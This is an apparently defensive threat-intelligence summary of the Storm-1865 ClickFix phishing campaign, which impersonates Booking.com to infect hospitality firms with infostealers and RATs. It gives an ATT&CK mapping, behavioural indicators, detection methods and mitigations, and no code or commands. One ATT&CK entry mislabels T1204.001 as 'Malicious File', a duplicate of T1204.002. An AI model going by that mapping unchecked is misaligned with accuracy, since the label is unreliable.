Full Report
Microsoft said the ongoing phishing campaign is designed to infect hospitality firms with multiple credential-stealing malware
Analysis Summary
# Tool/Technique: ClickFix Phishing Campaign
## Overview
A sophisticated, ongoing phishing campaign, attributed to the threat cluster Storm-1865, impersonating Booking.com to target hospitality organizations worldwide. The campaign utilizes the "ClickFix" social engineering technique to trick users into running commands that download malware, primarily focusing on stealing financial data and credentials for fraud.
## Technical Details
- Type: Technique/Campaign (utilizing various malware families)
- Platform: General (Social engineering targeting users interacting with booking systems)
- Capabilities: Social engineering to bypass standard security measures by enlisting user action (self-infection); deployment of multiple infostealers and RATs.
- First Seen: December 2024
## MITRE ATT&CK Mapping
Given the nature of the campaign involving deception leading to user execution of malicious commands and subsequent malware payload delivery:
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Likely attachments or links leading to execution)
- **TA0002 - Execution**
- T1204 - User Execution
- T1204.002 - Malicious File
- T1204.001 - Malicious File (if direct file execution is involved after the prompt)
## Functionality
### Core Capabilities
- **Impersonation:** Posing as Booking.com to establish trust with hospitality sector employees.
- **ClickFix Social Engineering:** Presenting fake error messages that instruct the user to copy, paste, and launch specific terminal commands to "fix" an issue (e.g., copying/pasting errors).
- **Self-Infection:** The user executes the malicious commands themselves, often bypassing automated security checks that rely on unsolicited execution.
### Advanced Features
- **Multi-Malware Deployment:** The campaign deploys several distinct malware families in succession or based on initial success, increasing the likelihood of data exfiltration.
- **Targeted Sector Focus:** Specifically targets hospitality firms likely engaged with Booking.com in North America, Oceania, South and Southeast Asia, and Europe.
## Indicators of Compromise
*Note: The provided text focuses on the technique and associated malware families rather than specific IOCs like hashes or C2 addresses for this specific incident.*
- File Hashes: [Not specified in text]
- File Names: [Not specified in text]
- Registry Keys: [Not specified in text]
- Network Indicators: [Not specified in text, but expected C2 infrastructure for deployed malware]
- Behavioral Indicators: User prompted to copy/paste and execute commands from a fraudulent message; subsequent execution of downloaded malware (XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, NetSup).
## Associated Threat Actors
- Storm-1865 (Attributed by Microsoft Threat Intelligence)
## Detection Methods
- [Signature-based detection (For known malware payloads deployed)]
- [Behavioral detection (Monitoring for user running arbitrary shell commands originating from unexpected sources/emails)]
- [YARA rules (For known malware payloads deployed)]
## Mitigation Strategies
- **User Training:** Aggressive training on recognizing sophisticated social engineering, especially the "fix-it" mentality that bypasses reporting procedures.
- **Execution Policy Enforcement:** Restrict or monitor the execution of commands pasted directly into command-line interfaces by standard users.
- **Endpoint Detection and Response (EDR):** Implement EDR capable of detecting suspicious command-line activity or the download/execution chain associated with infostealer deployment.
- **Email Filtering:** Ensure robust email gateway filtering to catch phishing attempts mimicking high-trust domains like Booking.com.
## Related Tools/Techniques
- **Malware Families Deployed:** XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, NetSup.
- **Technique Precedent:** Phishing techniques that rely on user execution of malicious scripts or commands (e.g., malicious macro execution, HTML smuggling leading to script execution).